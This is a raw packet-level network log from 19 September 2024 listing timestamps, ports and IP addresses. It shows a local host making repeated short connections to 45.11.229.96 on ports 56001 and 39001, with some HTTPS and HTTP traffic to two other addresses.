Sep 19, 2024 02:25:52.815839052 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.815857887 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.815876007 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.815876961 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.815901041 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.815934896 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.815953016 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.815972090 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.815973043 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.815987110 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.816032887 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.855775118 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.855843067 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.861104012 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.865919113 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.865993023 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.870815992 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.939311981 CEST	39001	49763	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.939409971 CEST	49763	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.939529896 CEST	49763	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.944325924 CEST	39001	49763	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:53.048079014 CEST	49764	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:53.053088903 CEST	39001	49764	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:53.053180933 CEST	49764	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:53.066416979 CEST	49764	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:53.071249962 CEST	39001	49764	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:53.071325064 CEST	49764	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:53.076097012 CEST	39001	49764	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:53.590085983 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:53.590150118 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:53.801675081 CEST	39001	49764	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:53.802144051 CEST	49764	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:54.192039013 CEST	49764	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:54.196980953 CEST	39001	49764	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:54.345304012 CEST	49765	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:54.350238085 CEST	39001	49765	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:54.350310087 CEST	49765	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:54.386279106 CEST	49765	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:54.391062021 CEST	39001	49765	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:54.391113043 CEST	49765	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:54.395879030 CEST	39001	49765	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:54.980896950 CEST	39001	49765	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:54.980988026 CEST	49765	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:54.981112003 CEST	49765	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:54.985918999 CEST	39001	49765	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:55.095861912 CEST	49766	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:55.100874901 CEST	39001	49766	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:55.100950956 CEST	49766	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:55.116333008 CEST	49766	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:55.121279955 CEST	39001	49766	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:55.121342897 CEST	49766	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:55.126277924 CEST	39001	49766	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:55.720510006 CEST	39001	49766	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:55.720603943 CEST	49766	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:55.720731974 CEST	49766	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:55.725559950 CEST	39001	49766	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:55.829468966 CEST	49767	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:55.834604025 CEST	39001	49767	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:55.834695101 CEST	49767	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:55.848860979 CEST	49767	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:55.853889942 CEST	39001	49767	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:55.853964090 CEST	49767	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:55.859074116 CEST	39001	49767	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:56.472989082 CEST	39001	49767	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:56.474204063 CEST	49767	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:56.479130030 CEST	49767	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:56.483961105 CEST	39001	49767	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:56.680798054 CEST	49768	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:56.685986042 CEST	39001	49768	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:56.686080933 CEST	49768	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:57.324855089 CEST	49768	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:57.329680920 CEST	39001	49768	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:57.329725981 CEST	49768	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:57.334517956 CEST	39001	49768	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:57.668353081 CEST	39001	49768	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:57.668410063 CEST	49768	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:57.668566942 CEST	49768	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:57.673496962 CEST	39001	49768	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:57.782754898 CEST	49769	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:57.787777901 CEST	39001	49769	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:57.787878990 CEST	49769	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:57.800791979 CEST	49769	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:57.805751085 CEST	39001	49769	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:57.805821896 CEST	49769	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:57.810708046 CEST	39001	49769	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:58.184375048 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:58.189677000 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:58.448023081 CEST	39001	49769	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:58.448436975 CEST	49769	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:58.449110031 CEST	49769	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:58.453937054 CEST	39001	49769	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:58.598465919 CEST	49770	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:58.603715897 CEST	39001	49770	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:58.603826046 CEST	49770	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:58.639076948 CEST	49770	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:58.644015074 CEST	39001	49770	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:58.644512892 CEST	49770	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:58.649452925 CEST	39001	49770	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:59.268132925 CEST	39001	49770	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:59.268234968 CEST	49770	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:59.272304058 CEST	49770	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:59.277266979 CEST	39001	49770	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:59.408422947 CEST	49771	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:59.413608074 CEST	39001	49771	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:59.413727999 CEST	49771	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:59.433614969 CEST	49771	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:59.439146996 CEST	39001	49771	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:59.439408064 CEST	49771	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:59.444886923 CEST	39001	49771	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:00.216974020 CEST	39001	49771	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:00.217067003 CEST	49771	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:00.421623945 CEST	49771	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:00.426584959 CEST	39001	49771	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:00.564097881 CEST	49772	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:00.569324970 CEST	39001	49772	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:00.569405079 CEST	49772	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:00.612850904 CEST	49772	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:00.617754936 CEST	39001	49772	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:00.617810965 CEST	49772	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:00.622693062 CEST	39001	49772	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:01.368460894 CEST	39001	49772	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:01.368544102 CEST	49772	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:01.368643045 CEST	49772	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:01.381194115 CEST	39001	49772	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:01.485744953 CEST	49774	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:01.490648985 CEST	39001	49774	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:01.490720987 CEST	49774	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:01.502927065 CEST	49774	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:01.508349895 CEST	39001	49774	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:01.508435011 CEST	49774	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:01.520029068 CEST	39001	49774	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:02.270234108 CEST	39001	49774	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:02.270392895 CEST	49774	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:02.270556927 CEST	49774	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:02.275940895 CEST	39001	49774	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:02.383141994 CEST	49775	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:02.388288021 CEST	39001	49775	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:02.388376951 CEST	49775	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:02.401290894 CEST	49775	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:02.406198978 CEST	39001	49775	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:02.406291008 CEST	49775	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:02.411144018 CEST	39001	49775	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:03.001369953 CEST	39001	49775	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:03.001442909 CEST	49775	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:03.030670881 CEST	49775	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:03.036621094 CEST	39001	49775	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:03.443525076 CEST	49776	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:03.448466063 CEST	39001	49776	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:03.448532104 CEST	49776	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:03.575042009 CEST	49776	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:03.581557989 CEST	39001	49776	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:03.581619024 CEST	49776	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:03.586424112 CEST	39001	49776	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:04.090600967 CEST	39001	49776	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:04.090668917 CEST	49776	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:04.090828896 CEST	49776	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:04.095634937 CEST	39001	49776	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:04.204535007 CEST	49777	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:04.211878061 CEST	39001	49777	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:04.211965084 CEST	49777	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:04.227715015 CEST	49777	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:04.232578039 CEST	39001	49777	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:04.232685089 CEST	49777	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:04.237524986 CEST	39001	49777	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:04.595899105 CEST	49778	443	192.168.2.6	104.21.39.11
Sep 19, 2024 02:26:04.596014023 CEST	443	49778	104.21.39.11	192.168.2.6
Sep 19, 2024 02:26:04.596116066 CEST	49778	443	192.168.2.6	104.21.39.11
Sep 19, 2024 02:26:04.597770929 CEST	49778	443	192.168.2.6	104.21.39.11
Sep 19, 2024 02:26:04.597791910 CEST	443	49778	104.21.39.11	192.168.2.6
Sep 19, 2024 02:26:04.888142109 CEST	39001	49777	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:04.888623953 CEST	49777	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:04.888678074 CEST	49777	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:04.893615007 CEST	39001	49777	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:05.001692057 CEST	49779	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:05.006835938 CEST	39001	49779	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:05.006943941 CEST	49779	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:05.019712925 CEST	49779	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:05.024869919 CEST	39001	49779	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:05.025002003 CEST	49779	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:05.029817104 CEST	39001	49779	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:05.085742950 CEST	443	49778	104.21.39.11	192.168.2.6
Sep 19, 2024 02:26:05.085844994 CEST	49778	443	192.168.2.6	104.21.39.11
Sep 19, 2024 02:26:05.087424040 CEST	49778	443	192.168.2.6	104.21.39.11
Sep 19, 2024 02:26:05.087455988 CEST	443	49778	104.21.39.11	192.168.2.6
Sep 19, 2024 02:26:05.087876081 CEST	443	49778	104.21.39.11	192.168.2.6
Sep 19, 2024 02:26:05.136935949 CEST	49778	443	192.168.2.6	104.21.39.11
Sep 19, 2024 02:26:05.136936903 CEST	49778	443	192.168.2.6	104.21.39.11
Sep 19, 2024 02:26:05.137249947 CEST	443	49778	104.21.39.11	192.168.2.6
Sep 19, 2024 02:26:05.243357897 CEST	443	49778	104.21.39.11	192.168.2.6
Sep 19, 2024 02:26:05.243556023 CEST	443	49778	104.21.39.11	192.168.2.6
Sep 19, 2024 02:26:05.243644953 CEST	443	49778	104.21.39.11	192.168.2.6
Sep 19, 2024 02:26:05.243726969 CEST	443	49778	104.21.39.11	192.168.2.6
Sep 19, 2024 02:26:05.243741035 CEST	49778	443	192.168.2.6	104.21.39.11
Sep 19, 2024 02:26:05.243824959 CEST	443	49778	104.21.39.11	192.168.2.6
Sep 19, 2024 02:26:05.243871927 CEST	49778	443	192.168.2.6	104.21.39.11
Sep 19, 2024 02:26:05.243972063 CEST	443	49778	104.21.39.11	192.168.2.6
Sep 19, 2024 02:26:05.244045973 CEST	49778	443	192.168.2.6	104.21.39.11
Sep 19, 2024 02:26:05.246615887 CEST	49778	443	192.168.2.6	104.21.39.11
Sep 19, 2024 02:26:05.246650934 CEST	443	49778	104.21.39.11	192.168.2.6
Sep 19, 2024 02:26:05.246702909 CEST	49778	443	192.168.2.6	104.21.39.11
Sep 19, 2024 02:26:05.246716976 CEST	443	49778	104.21.39.11	192.168.2.6
Sep 19, 2024 02:26:05.363600016 CEST	49780	443	192.168.2.6	104.21.39.11
Sep 19, 2024 02:26:05.363642931 CEST	443	49780	104.21.39.11	192.168.2.6
Sep 19, 2024 02:26:05.363760948 CEST	49780	443	192.168.2.6	104.21.39.11
Sep 19, 2024 02:26:05.364299059 CEST	49780	443	192.168.2.6	104.21.39.11
Sep 19, 2024 02:26:05.364314079 CEST	443	49780	104.21.39.11	192.168.2.6
Sep 19, 2024 02:26:05.637675047 CEST	39001	49779	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:05.637743950 CEST	49779	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:05.645716906 CEST	49779	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:05.650621891 CEST	39001	49779	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:05.845684052 CEST	443	49780	104.21.39.11	192.168.2.6
Sep 19, 2024 02:26:05.845797062 CEST	49780	443	192.168.2.6	104.21.39.11
Sep 19, 2024 02:26:05.954807043 CEST	49780	443	192.168.2.6	104.21.39.11
Sep 19, 2024 02:26:05.954833031 CEST	443	49780	104.21.39.11	192.168.2.6
Sep 19, 2024 02:26:05.955420971 CEST	443	49780	104.21.39.11	192.168.2.6
Sep 19, 2024 02:26:05.957117081 CEST	49780	443	192.168.2.6	104.21.39.11
Sep 19, 2024 02:26:05.957117081 CEST	49780	443	192.168.2.6	104.21.39.11
Sep 19, 2024 02:26:05.957295895 CEST	443	49780	104.21.39.11	192.168.2.6
Sep 19, 2024 02:26:06.338766098 CEST	49781	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:06.343636036 CEST	39001	49781	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:06.343705893 CEST	49781	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:06.365624905 CEST	443	49780	104.21.39.11	192.168.2.6
Sep 19, 2024 02:26:06.365865946 CEST	443	49780	104.21.39.11	192.168.2.6
Sep 19, 2024 02:26:06.365922928 CEST	49780	443	192.168.2.6	104.21.39.11
Sep 19, 2024 02:26:06.366108894 CEST	49780	443	192.168.2.6	104.21.39.11
Sep 19, 2024 02:26:06.366108894 CEST	49780	443	192.168.2.6	104.21.39.11
Sep 19, 2024 02:26:06.366132975 CEST	443	49780	104.21.39.11	192.168.2.6
Sep 19, 2024 02:26:06.366144896 CEST	443	49780	104.21.39.11	192.168.2.6
Sep 19, 2024 02:26:06.470330954 CEST	49781	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:06.476627111 CEST	39001	49781	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:06.476689100 CEST	49781	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:06.481537104 CEST	39001	49781	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:06.986068964 CEST	39001	49781	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:06.986156940 CEST	49781	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:06.991204977 CEST	49781	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:06.997802973 CEST	39001	49781	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:07.153340101 CEST	49782	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:07.158384085 CEST	39001	49782	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:07.158461094 CEST	49782	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:07.193085909 CEST	49782	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:07.200351000 CEST	39001	49782	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:07.201332092 CEST	49782	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:07.206126928 CEST	39001	49782	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:08.069407940 CEST	39001	49782	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:08.070183992 CEST	49782	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:08.070318937 CEST	49782	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:08.075115919 CEST	39001	49782	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:08.173165083 CEST	49784	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:08.183600903 CEST	39001	49784	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:08.186168909 CEST	49784	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:08.199047089 CEST	49784	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:08.203963995 CEST	39001	49784	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:08.206371069 CEST	49784	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:08.211205006 CEST	39001	49784	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:08.828001976 CEST	39001	49784	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:08.828054905 CEST	49784	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:08.828254938 CEST	49784	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:08.833612919 CEST	39001	49784	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:08.947669983 CEST	49785	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:08.952843904 CEST	39001	49785	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:08.952908039 CEST	49785	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:09.058640003 CEST	49785	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:09.063553095 CEST	39001	49785	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:09.063608885 CEST	49785	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:09.068350077 CEST	39001	49785	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:09.589246988 CEST	39001	49785	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:09.589319944 CEST	49785	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:09.589442968 CEST	49785	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:09.594248056 CEST	39001	49785	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:09.710839033 CEST	49787	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:09.715850115 CEST	39001	49787	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:09.715953112 CEST	49787	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:09.726952076 CEST	49787	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:09.733208895 CEST	39001	49787	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:09.733266115 CEST	49787	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:09.738152027 CEST	39001	49787	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:10.354767084 CEST	39001	49787	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:10.358263969 CEST	49787	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:10.358414888 CEST	49787	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:10.363189936 CEST	39001	49787	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:10.405206919 CEST	80	49730	95.179.241.203	192.168.2.6
Sep 19, 2024 02:26:10.453588963 CEST	49730	80	192.168.2.6	95.179.241.203
Sep 19, 2024 02:26:10.470016956 CEST	49788	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:10.475011110 CEST	39001	49788	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:10.475132942 CEST	49788	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:10.511246920 CEST	49788	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:10.516041994 CEST	39001	49788	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:10.516249895 CEST	49788	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:10.521017075 CEST	39001	49788	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:11.161926031 CEST	39001	49788	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:11.162106037 CEST	49788	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:11.162164927 CEST	49788	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:11.166918039 CEST	39001	49788	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:11.267429113 CEST	49789	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:11.272393942 CEST	39001	49789	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:11.272748947 CEST	49789	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:11.283195972 CEST	49789	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:11.288343906 CEST	39001	49789	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:11.288429976 CEST	49789	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:11.293961048 CEST	39001	49789	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:11.915182114 CEST	39001	49789	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:11.915270090 CEST	49789	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:11.915416956 CEST	49789	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:11.920145035 CEST	39001	49789	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:12.032932043 CEST	49790	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:12.037796021 CEST	39001	49790	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:12.037873983 CEST	49790	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:12.053716898 CEST	49790	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:12.058636904 CEST	39001	49790	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:12.058716059 CEST	49790	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:12.063534975 CEST	39001	49790	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:12.544037104 CEST	80	49730	95.179.241.203	192.168.2.6
Sep 19, 2024 02:26:12.594213963 CEST	49730	80	192.168.2.6	95.179.241.203
Sep 19, 2024 02:26:12.610326052 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:12.615499020 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:12.615556002 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:12.620358944 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:12.697786093 CEST	39001	49790	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:12.697870016 CEST	49790	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:12.697983980 CEST	49790	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:12.706418991 CEST	39001	49790	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:12.813874006 CEST	49791	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:12.819236040 CEST	39001	49791	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:12.819328070 CEST	49791	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:12.842637062 CEST	49791	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:12.847932100 CEST	39001	49791	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:12.847985029 CEST	49791	39001	192.168.2.6	45.11.229.96
